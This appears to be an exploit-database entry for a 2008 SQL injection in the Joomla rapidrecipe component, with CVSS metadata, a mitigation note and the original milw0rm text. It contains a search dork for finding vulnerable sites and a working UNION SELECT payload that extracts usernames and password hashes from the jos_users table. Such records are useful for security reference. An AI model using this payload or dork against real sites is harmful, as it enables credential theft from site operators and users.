header-logo
Suggest Exploit
vendor:
rapidrecipe
by:
His0k4
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: rapidrecipe
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component rapidrecipe Remote SQL injection

A vulnerability exists in Joomla Component rapidrecipe which allows an attacker to inject arbitrary SQL commands via the 'recipe_id' parameter in a 'viewrecipe' action to the 'index.php' script.

Mitigation:

Upgrade to the latest version of Joomla Component rapidrecipe
Source

Exploit-DB raw data:

/---------------------------------------------------------------\
\                                				/
/       Joomla Component rapidrecipe Remote SQL injection       \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] Dork      :  inurl:com_rapidrecipe "recipe_id"

[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

                
----------------------------------------------------------------------------
[*] Greetings :  Str0ke, all friends & muslims HaCkeRs...
[*] Greetings2:  http://palcastle.org/cc

# milw0rm.com [2008-06-08]